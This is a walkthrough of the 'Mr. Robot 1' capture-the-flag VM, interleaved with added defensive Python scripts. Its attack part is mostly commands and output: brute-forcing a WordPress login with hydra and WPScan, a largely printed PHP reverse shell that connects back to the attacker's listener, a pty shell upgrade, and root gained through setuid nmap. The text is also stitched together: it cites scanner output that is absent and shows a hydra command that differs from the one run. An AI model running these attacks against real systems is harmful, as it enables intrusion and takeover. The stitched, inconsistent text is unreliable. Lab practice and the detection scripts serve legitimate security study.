Mr. Robot is a popular TV series, known mainly for its elite hacker Ellon Elliot. Today we will show a CTF (Capture the Flag), as demonstrated by an ethical hacking student of International Institute of Cyber Security.

  • For testing we will use Kali Linux 2019.1 amd64 and the Mr. Robot 1 VM. Download Kali from: https://www.kali.org/downloads/
  • Download Mr. Robot 1 from https://www.vulnhub.com/entry/mr-robot-1,151/. We are using VirtualBox for this CTF.
  • Download VirtualBox from: https://www.virtualbox.org/
  • After downloading, open the Mr. Robot VM in VirtualBox and start it.
  • The Mr. Robot 1 VM will then boot.
  • Change the Mr. Robot 1 VM network adapter setting to bridged adapter.
  • After changing the network settings, open Kali Linux and type the netdiscover command to list live IP addresses; this helps find the Mr. Robot VM's IP address.
  • Here 192.168.1.4 is our target. Open a web browser and type 192.168.1.4
  • For further information gathering we check robots.txt to find which pages are allowed or disallowed. Type 192.168.1.4/robots.txt
  • Opening that URL in the browser shows the file contents.
  • On Kali, open a terminal and type wget 192.168.1.4/fsocity.dic
  • Then type wget 192.168.1.4/key-1-of-3.txt
root@kali:/home/iicybersecurity/Desktop# wget 192.168.1.4/fsocity.dic
 --2019-09-28 01:44:33--  https://192.168.1.4/fsocity.dic
 Connecting to 192.168.1.4:80… connected.
 HTTP request sent, awaiting response… 200 OK
 Length: 7245381 (6.9M) 
 Saving to: ‘fsocity.dic’
 fsocity.dic                    100%[==================================================>]   6.91M  35.8MB/s    in 0.2s
 2019-09-28 01:44:34 (35.8 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]

 root@kali:/home/iicybersecurity/Desktop# wget 192.168.1.4/key-1-of-3.txt
 --2019-09-28 01:44:54--  https://192.168.1.4/key-1-of-3.txt
 Connecting to 192.168.1.4:80… connected.
 HTTP request sent, awaiting response… 200 OK
 Length: 33 
 Saving to: ‘key-1-of-3.txt’
 key-1-of-3.txt                 100%[==================================================>]      33  --.-KB/s    in 0s
 2019-09-28 01:44:54 (4.68 MB/s) - ‘key-1-of-3.txt’ saved [33/33]
  • Here we have the first key. Type cat key-1-of-3.txt
  • According to the ethical hacking researcher of International Institute of Cyber Security, getting the key is easy if you are clear on the concepts.
root@kali:/home/iicybersecurity/Desktop# cat key-1-of-3.txt
 073403c8a58a1f80d943455fb30724b9
  • To get the remaining two keys we have to gain access to the Mr. Robot 1 VM.
  • Type cat fsocity.dic
root@kali:/home/iicybersecurity/Desktop# cat fsocity.dic
 true
 false
 wikia
 from
 the
 now
 Wikia
 extensions
 scss
 window
 http
 var
 page
 Robot
 Elliot
 styles
 and
 document
 mrrobot
 com
 ago
 function
 eps1
 null
 chat
 user
 Special
 GlobalNavigation
 images
 net
 push
 category
 Alderson
 lang
 nocookie
 ext
 his
 output
 SLOTNAME
  • Type cat fsocity.dic | sort -u | uniq > wordlist.dic to create a de-duplicated wordlist.
root@kali:/home/iicybersecurity/Desktop# cat fsocity.dic | sort -u | uniq > wordlist.dic
 root@kali:/home/iicybersecurity/Desktop#
  • Now we will use nikto. Type nikto -h 192.168.1.4 to find the accessible web pages.
  • 192.168.1.4 is our target.
root@kali:/home/iicybersecurity/Desktop# nikto -h 192.168.1.4
 - Nikto v2.1.6
 Target IP:          192.168.1.4
 Target Hostname:    192.168.1.4
 Target Port:        80 
 + Start Time:         2019-09-28 01:55:04 (GMT-4)
 Server: Apache
 The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 Retrieved x-powered-by header: PHP/5.5.29
 No CGI Directories found (use '-C all' to force check all possible dirs)
 Uncommon header 'tcn' found, with contents: list
 Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See https://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
 OSVDB-3092: /admin/: This might be interesting…
 Uncommon header 'link' found, with contents: https://192.168.1.4/?p=23; rel=shortlink
 /wp-links-opml.php: This WordPress script reveals the installed version.
 OSVDB-3092: /license.txt: License file found may identify site software.
 /admin/index.html: Admin login page/section found.
 Cookie wordpress_test_cookie created without the httponly flag
 /wp-login/: Admin login page/section found.
 /wordpress: A WordPress installation was found.
 /wp-admin/wp-login.php: WordPress login found
 /wordpresswp-admin/wp-login.php: WordPress login found
 /blog/wp-login.php: WordPress login found
 /wp-login.php: WordPress login found
 /wordpresswp-login.php: WordPress login found
 7915 requests: 0 error(s) and 18 item(s) reported on remote host 
 + End Time:           2019-09-28 01:58:38 (GMT-4) (214 seconds)
 1 host(s) tested 
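Both scanner outputs on this page report the same class of response-header weakness: Raccoon flagged PHPSESSID without the Secure and HttpOnly flags on hackthissite.org, and Nikto above flagged wordpress_test_cookie without HttpOnly, a missing X-Content-Type-Options header, an undefined X-XSS-Protection header and a version-revealing X-Powered-By. The Python below is an added example, not code from the article, Raccoon or Nikto, that audits a raw HTTP response for exactly those findings and shows a hardened response that passes. The two responses are constructed to resemble the lab targets; header and cookie names come from the scanner output above, everything else is an assumption.

```python
"""Audit of HTTP response headers for the findings Raccoon and Nikto reported:
session cookies without Secure/HttpOnly, missing X-Content-Type-Options and
X-XSS-Protection, and version disclosure in X-Powered-By / Server.

Added example, not the scanners' code. Both responses are constructed.
"""
import re


def parse_response(raw: str):
    """Split a raw HTTP response into (status line, [(lower-name, value), ...]).
    Header order and repeats are kept, because Set-Cookie may appear many times."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def cookie_findings(headers):
    """[(cookie name, [missing flags])] for every Set-Cookie lacking Secure or HttpOnly."""
    findings = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}   # attribute names only
        missing = [flag for flag in ("secure", "httponly") if flag not in attrs]
        if missing:
            findings.append((cookie_name, missing))
    return findings


def header_findings(headers):
    """Textual findings for the header checks Nikto printed above."""
    present = {name: value for name, value in headers}
    findings = []
    if present.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("x-content-type-options missing or not 'nosniff'")
    # Legacy header: modern browsers ignore it and CSP supersedes it, but
    # scanners such as Nikto still report its absence.
    if "x-xss-protection" not in present:
        findings.append("x-xss-protection not set")
    for disclosing in ("x-powered-by", "server"):
        value = present.get(disclosing, "")
        if re.search(r"\d+\.\d+", value):          # a dotted version number
            findings.append(f"{disclosing} discloses a version: {value}")
    return findings


def audit(raw: str) -> dict:
    _, headers = parse_response(raw)
    return {"cookies": cookie_findings(headers), "headers": header_findings(headers)}


# Constructed response resembling the scanned lab hosts.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Powered-By: PHP/5.5.29\r\n"
    "Set-Cookie: PHPSESSID=c0nstructedsessionid; path=/\r\n"
    "Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure\r\n"
    "Content-Type: text/html\r\n"
    "\r\n<html>...</html>"
)

# The same response with the findings fixed.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "Set-Cookie: PHPSESSID=c0nstructedsessionid; path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Content-Type: text/html\r\n"
    "\r\n<html>...</html>"
)

if __name__ == "__main__":
    print("weak:    ", audit(WEAK_RESPONSE))
    print("hardened:", audit(HARDENED_RESPONSE))
```

For PHP sessions the cookie flags are set server-side (session.cookie_secure and session.cookie_httponly in php.ini), and the X-Powered-By disclosure disappears with expose_php = Off; the same audit can be pointed at any captured response from Burpsuite or OWASP ZAP.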
  • To get login credentials we will use hydra, which comes built into Kali Linux.
  • Type hydra -V -L wordlist.dic -p 123 192.168.1.4 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
  • -V enables verbose mode.
  • -L supplies the list of login names; we are using the wordlist created above.
  • -p tries the single password 123.
  • Hydra uses the http-post-form module, since Nikto has already shown that the target exposes the login page; the text after F= is the response string that marks a failed attempt.
root@kali:/home/iicybersecurity/Desktop# hydra -V -L wordlist.dic -p 123 192.168.1.4 http-post-form '/news.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-28 02:02:19
 [DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:11452/p:1), ~716 tries per task
[DATA] attacking http-post-form://192.168.1.4:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username
[ATTEMPT] target 192.168.1.4 - login "000" - pass "123" - 1 of 11452 [child 0] (0/0)
[ATTEMPT] target 192.168.1.4 - login "000000" - pass "123" - 2 of 11452 [child 1] (0/0)
[ATTEMPT] target 192.168.1.4 - login "000080" - pass "123" - 3 of 11452 [child 2] (0/0)
[ATTEMPT] target 192.168.1.4 - login "001" - pass "123" - 4 of 11452 [child 3] (0/0)
[ATTEMPT] target 192.168.1.4 - login "002" - pass "123" - 5 of 11452 [child 4] (0/0)
[ATTEMPT] target 192.168.1.4 - login "003" - pass "123" - 6 of 11452 [child 5] (0/0)
[ATTEMPT] target 192.168.1.4 - login "0032" - pass "123" - 7 of 11452 [child 6] (0/0)
[ATTEMPT] target 192.168.1.4 - login "003s" - pass "123" - 8 of 11452 [child 7] (0/0)
[ATTEMPT] target 192.168.1.4 - login "004" - pass "123" - 9 of 11452 [child 8] (0/0)
[ATTEMPT] target 192.168.1.4 - login "00480" - pass "123" - 10 of 11452 [child 9] (0/0)
[ATTEMPT] target 192.168.1.4 - login "004s" - pass "123" - 11 of 11452 [child 10] (0/0)
[ATTEMPT] target 192.168.1.4 - login "005s" - pass "123" - 12 of 11452 [child 11] (0/0)
[ATTEMPT] target 192.168.1.4 - login "006s" - pass "123" - 13 of 11452 [child 12] (0/0)
[ATTEMPT] target 192.168.1.4 - login "embed" - pass "123" - 5488 of 11452 [child 8] (0/0)
[80][http-post-form] host: 192.168.1.4   login: Elliot   password: 123
[80][http-post-form] host: 192.168.1.4   login: elliot   password: 123
[ATTEMPT] target 192.168.1.4 - login "Embedded" - pass "123" - 5489 of 11452 child 4
[80][http-post-form] host: 192.168.1.4   login: ELLIOT   password: 123
[ATTEMPT] target 192.168.1.4 - login "embodiment" - pass "123" - 5490 of 11452 child 2
  • Hydra has revealed the username Elliot. Now we will find the password.
  • For that we will use WPScan.
  • WPScan is a WordPress security scanner preinstalled in Kali Linux; it can also run password attacks against a WordPress login.
  • Type wpscan --url 192.168.1.4 --passwords /home/iicybersecurity/Desktop/wordlist.dic --usernames Elliot
  • --url – 192.168.1.4 is our target.
  • --passwords – wordlist.dic, the wordlist we created above.
  • --usernames – Elliot, the username found with hydra.
root@kali:/home/iicybersecurity/Desktop# wpscan --url 192.168.1.4 --passwords /home/iicybersecurity/Desktop/wordlist.dic --usernames Elliot
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.6.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: https://192.168.1.4/
 [+] Started: Sat Sep 28 02:07:13 2019
 Interesting Finding(s):
 [+] https://192.168.1.4/
  | Interesting Entries:
  |  - Server: Apache
  |  - X-Mod-Pagespeed: 1.9.32.3-4523
  | Found By: Headers (Passive Detection)
  | Confidence: 100%
 [+] https://192.168.1.4/robots.txt
  | Found By: Robots Txt (Aggressive Detection)
  | Confidence: 100%
 [+] https://192.168.1.4/xmlrpc.php
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%
  | References:
  |  - https://codex.wordpress.org/XML-RPC_Pingback_API
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
 [+] https://192.168.1.4/readme.html
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%
 [+] https://192.168.1.4/wp-cron.php
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 60%
  | References:
  |  - https://www.iplocation.net/defend-wordpress-from-ddos
  |  - https://github.com/wpscanteam/wpscan/issues/1299
 [+] WordPress version 4.3.20 identified (Latest, released on 2019-09-05).
  | Detected By: Rss Generator (Aggressive Detection)
  |  - https://192.168.1.4/feed/, https://wordpress.org/?v=4.3.20
  |  - https://192.168.1.4/comments/feed/, https://wordpress.org/?v=4.3.20
 [i] The main theme could not be detected.
 [+] Enumerating All Plugins (via Passive Methods)
 [i] No plugins Found.
 [+] Enumerating Config Backups (via Passive and Aggressive Methods)
  Checking Config Backups - Time: 00:00:00 <=============================================> (21 / 21) 100.00% Time: 00:00:00
 [i] No Config Backups Found.
 [+] Performing password attack on Xmlrpc Multicall against 1 user/s
 [SUCCESS] - Elliot / ER28-0652
 All Found
 Progress Time: 00:00:19 <==================================                              > (12 / 22) 54.54%  ETA: ??:??:??
 [i] Valid Combinations Found:
  | Username: Elliot, Password: ER28-0652
 [+] Finished: Sat Sep 28 02:07:35 2019
 [+] Requests Done: 63
 [+] Cached Requests: 5
 [+] Data Sent: 14.907 KB
 [+] Data Received: 1.282 MB
 [+] Memory used: 183.5 MB
 [+] Elapsed time: 00:00:21
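Both credential attacks above leave a distinctive trace in the target's web server log: hydra produces one POST to /wp-login.php per guess, while WPScan packs many guesses into a single XML-RPC multicall request. The following Python script is an added example, not part of this walkthrough, that flags a burst of POSTs to /wp-login.php and any POST at all to /xmlrpc.php; the Apache log lines it processes are constructed, and the 60-second window and threshold of 10 are assumed values to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined-log prefix: ip, ident, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# POSTs per source within the window before the endpoint is flagged (assumed values).
# Every POST to xmlrpc.php is reported because one system.multicall request can carry
# hundreds of password guesses, which is what the WPScan run above relies on.
THRESHOLDS = {"/wp-login.php": 10, "/xmlrpc.php": 0}


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for a non-matching line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def find_bruteforce(lines, window=timedelta(seconds=60)):
    """Return {ip: {path: peak POSTs in any `window`}} for sources exceeding THRESHOLDS."""
    posts = defaultdict(lambda: defaultdict(list))
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] in THRESHOLDS:
            posts[rec[0]][rec[3]].append(rec[1])
    findings = {}
    for ip, by_path in posts.items():
        for path, stamps in by_path.items():
            stamps.sort()
            peak, j = 0, 0
            for i, t in enumerate(stamps):  # sliding window over sorted timestamps
                while stamps[j] < t - window:
                    j += 1
                peak = max(peak, i - j + 1)
            if peak > THRESHOLDS[path]:
                findings.setdefault(ip, {})[path] = peak
    return findings


def sample_log():
    """Constructed log lines mimicking the hydra and WPScan runs (not real captures)."""
    base = datetime(2019, 9, 28, 2, 2, 19)  # hydra start time from the walkthrough
    fmt = "%d/%b/%Y:%H:%M:%S"
    lines = [f'192.168.1.2 - - [{(base + timedelta(seconds=i)).strftime(fmt)} -0400] '
             f'"POST /wp-login.php HTTP/1.1" 200 3721' for i in range(15)]
    later = (base + timedelta(minutes=5)).strftime(fmt)
    lines.append(f'192.168.1.2 - - [{later} -0400] "POST /xmlrpc.php HTTP/1.1" 200 1215')
    lines.append(f'192.168.1.50 - - [{later} -0400] "GET /wp-login.php HTTP/1.1" 200 3721')
    return lines
```

Running find_bruteforce(sample_log()) reports the attacking host with 15 login POSTs in one window and one XML-RPC POST, while the single GET from the other host is ignored.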
  • WPScan has found the password. Now we will log in with the username Elliot and the password ER28-0652.
  • Above you can see that the login page has opened.
  • Now we have to find the remaining 2 keys.
  • For that we need a remote shell on the target. We will upload a PHP file to the server through the WordPress session we now have.
  • To get the PHP file, go to: https://pentestmonkey.net/tools/web-shells/php-reverse-shell
  • Download the reverse shell code: open a terminal and type wget https://pentestmonkey.net/tools/php-reverse-shell1.0.tar.gz
  • You can also write your own PHP reverse shell, which is covered in the exploit courses offered by International Institute of Cyber Security.
root@kali:/home/iicybersecurity/Downloads# wget https://pentestmonkey.net/tools/php-reverse-shell1.0.tar.gz
 --2019-09-30 02:01:28--  https://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.
 Resolving pentestmonkey.net (pentestmonkey.net)… 213.165.242.10, 2001:bd0:100:0:1::1
 Connecting to pentestmonkey.net (pentestmonkey.net)|213.165.242.10|:80… connected.
 HTTP request sent, awaiting response… 200 OK
 Length: 9018 (8.8K) [application/x-gzip]
 Saving to: ‘php-reverse-shell-1.0.tar.gz’
 php-reverse-shell-1.0.tar.gz 100%[=============================================>]   8.81K  --.-K
 2019-09-30 02:01:29 (14.9 MB/s) - ‘php-reverse-shell-1.0.tar.gz’ saved [9018/9018]
  • Type tar -xvzf php-reverse-shell-1.0.tar.gz
root@kali:/home/iicybersecurity/Downloads# tar -xvzf php-reverse-shell-1.0.tar.gz
 php-reverse-shell-1.0/
 php-reverse-shell-1.0/COPYING.GPL
 php-reverse-shell-1.0/COPYING.PHP-REVERSE-SHELL
 php-reverse-shell-1.0/php-reverse-shell.php
 php-reverse-shell-1.0/CHANGELOG
  • Type cd php-reverse-shell-1.0/ && ls
root@kali:/home/iicybersecurity/Downloads# cd php-reverse-shell-1.0/
root@kali:/home/iicybersecurity/Downloads/php-reverse-shell-1.0# ls
 CHANGELOG  COPYING.GPL  COPYING.PHP-REVERSE-SHELL  php-reverse-shell.php
  • Upload php-reverse-shell.php as the theme's 404 Template. Before uploading, change the IP address and port in the file: use 192.168.1.2 (our Kali Linux IP address) and port 4444.
  • Log in to the WordPress dashboard, go to Appearance > Editor and open the 404 Template.
  • Copy the contents of php-reverse-shell.php into it.
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See https://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.2';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
        // Fork and have the parent process exit
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }
        // Make the current process a session leader
        // Will only succeed if we forked
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }
        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection


==================================================
=================== SNIPPED ======================
==================================================


        }
        // If we can read from the process's STDERR
        // send data down tcp connection
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
        if (!$daemon) {
                print "$string\n";
        }
}
?>
  • Open a terminal on Kali and type nc -lvp 4444
  • Open a web browser and visit https://192.168.1.4/wp-content/themes/twentyfifteen/404.php
  • When the 404 page is requested, the netcat listener receives a reverse shell from the Mr. Robot VM.
root@kali:/home/iicybersecurity/Downloads/php-reverse-shell-1.0# nc -lvp 4444
 listening on [any] 4444 …
 192.168.1.4: inverse host lookup failed: Unknown host
 connect to [192.168.1.2] from (UNKNOWN) [192.168.1.4] 48232
 Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 G
  06:32:42 up  1:37,  0 users,  load average: 0.02, 0.07, 0.07
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=1(daemon) gid=1(daemon) groups=1(daemon)
 /bin/sh: 0: can't access tty; job control turned off
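From the defender's side, the theme-editor route used above is both easy to close and easy to audit for. This added Python script (not part of the walkthrough and not from pentestmonkey's tool) checks whether wp-config.php sets DISALLOW_FILE_EDIT, which removes the Appearance > Editor page, and scans every theme PHP file for the process and socket calls a reverse shell depends on; the WordPress tree it inspects is constructed in a temporary directory, and the marker list is an assumed set.

```python
import os
import re
import tempfile

# PHP calls a reverse shell needs (assumed marker set); a stock theme template never uses them.
SHELL_MARKERS = re.compile(r"\b(proc_open|fsockopen|popen|shell_exec|passthru|pcntl_fork)\s*\(")
DISALLOW_RE = re.compile(r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)


def file_edit_disabled(wp_config_text):
    """True if wp-config.php defines DISALLOW_FILE_EDIT, which removes Appearance > Editor."""
    return DISALLOW_RE.search(wp_config_text) is not None


def suspicious_theme_files(themes_dir):
    """Map theme-relative .php paths to the sorted shell-related calls found in them."""
    hits = {}
    for root, _, files in os.walk(themes_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                found = sorted(set(SHELL_MARKERS.findall(f.read())))
            if found:
                hits[os.path.relpath(path, themes_dir)] = found
    return hits


def audit(wp_root):
    """Run both checks against a WordPress document root."""
    with open(os.path.join(wp_root, "wp-config.php"), encoding="utf-8") as f:
        config = f.read()
    return {"file_edit_disabled": file_edit_disabled(config),
            "suspicious": suspicious_theme_files(os.path.join(wp_root, "wp-content", "themes"))}


def build_sample_install():
    """Constructed WordPress tree: editor left enabled and a 404.php overwritten with
    a two-line stand-in for the reverse shell (not a working payload)."""
    wp_root = tempfile.mkdtemp()
    theme = os.path.join(wp_root, "wp-content", "themes", "twentyfifteen")
    os.makedirs(theme)
    with open(os.path.join(theme, "index.php"), "w") as f:
        f.write("<?php get_header(); ?>\n<?php get_footer(); ?>\n")
    with open(os.path.join(theme, "404.php"), "w") as f:
        f.write("<?php\n$sock = fsockopen($ip, $port);\n"
                "$process = proc_open($shell, $descriptorspec, $pipes);\n")
    with open(os.path.join(wp_root, "wp-config.php"), "w") as f:
        f.write("<?php\ndefine('DB_NAME', 'wordpress');\n")  # no DISALLOW_FILE_EDIT
    return wp_root


if __name__ == "__main__":
    print(audit(build_sample_install()))
```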
  • Type ls
 $ ls
 bin
 boot
 dev
 etc
 home
 initrd.img
 lib
 lib64
 lost+found
 media
 mnt
 opt
 proc
 root
 run
 sbin
 srv
 sys
 tmp
 usr
 var
 vmlinuz 

 $ pwd
 pwd
 /
  • Type python -c 'import pty; pty.spawn("/bin/sh")' to upgrade to an interactive shell, which we need for working in the robot directory.
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ ls
 ls
 robot
  • Searching further, we find the 2nd key in the robot home directory. Type cd /home/robot && ls
$ pwd
  pwd
  /home/robot
$ ls
  ls
  key-2-of-3.txt  password.raw-md5
$ cat key-2-of-3.txt
  cat key-2-of-3.txt
  822c73956184f694993bede3eb39f959
$ cat password.raw-md5
  cat password.raw-md5
  robot:c3fcd3d76192e4007dfb496cca67e13b
  • The password.raw-md5 file above stores the robot user's password as a raw (unsalted) MD5 hash. Go to crackstation.net and paste that hash.
  • Click on Crack Hashes.
  • The result shows the password is the alphabet in order: abcdefghijklmnopqrstuvwxyz
  • Type su - robot and enter the password.
$ su - robot
 su - robot
 Password: abcdefghijklmnopqrstuvwxyz
  • Type find / -perm -u=s -type f 2>/dev/null to list setuid binaries; one of them leads to the 3rd key.
$ find / -perm -u=s -type f 2>/dev/null
 find / -perm -u=s -type f 2>/dev/null
 /bin/ping
 /bin/umount
 /bin/mount
 /bin/ping6
 /bin/su
 /usr/bin/passwd
 /usr/bin/newgrp
 /usr/bin/chsh
 /usr/bin/chfn
 /usr/bin/gpasswd
 /usr/bin/sudo
 /usr/local/bin/nmap
 /usr/lib/openssh/ssh-keysign
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
 /usr/lib/pt_chown
  • The command lists many files, but we are most interested in /usr/local/bin/nmap, which is setuid.
  • Type nmap --interactive, then at the nmap> prompt type !sh. You will see that we now have root privileges.
$ nmap --interactive
  nmap --interactive
  Starting nmap V. 3.81 ( https://www.insecure.org/nmap/ )
  Welcome to Interactive Mode -- press h  for help
  nmap> !sh
  !sh
  #
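The setuid nmap that gave root above is exactly the kind of finding a periodic SUID audit catches. The following Python script is an added example, not part of the walkthrough: it parses the find output shown above (embedded as a constructed string), compares it against an assumed baseline of expected setuid files, and additionally flags setuid files under directories such as /usr/local where they are rarely legitimate; scan_suid performs the same collection live on a host.

```python
import os
import stat

# Output of the find command above, embedded as a constructed string for offline use.
FIND_OUTPUT = "\n".join([
    "/bin/ping", "/bin/umount", "/bin/mount", "/bin/ping6", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/local/bin/nmap",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper", "/usr/lib/pt_chown",
]) + "\n"

# Assumed baseline of setuid files a stock build of this image would carry. In practice,
# generate it from a known-good host and keep it under version control.
BASELINE = {
    "/bin/ping", "/bin/umount", "/bin/mount", "/bin/ping6", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
}
# Directories where a setuid file is almost never legitimate on a server.
RISKY_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/")


def parse_find_output(text):
    """Set of absolute paths from `find / -perm -u=s -type f` output."""
    return {line.strip() for line in text.splitlines() if line.startswith("/")}


def scan_suid(root="/"):
    """Live equivalent of the find command: walk `root` and collect setuid regular files."""
    found = set()
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


def unexpected_suid(found, baseline=BASELINE):
    """Setuid files not in the baseline, plus any in risky locations even if baselined."""
    return sorted((found - baseline) | {p for p in found if p.startswith(RISKY_PREFIXES)})


if __name__ == "__main__":
    print(unexpected_suid(parse_find_output(FIND_OUTPUT)))  # ['/usr/local/bin/nmap']
```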
  • Type cd /root && ls
  • Type cat key-3-of-3.txt
 $ pwd
   pwd
   /root
 cd /root
 cd /root
 #
 ls
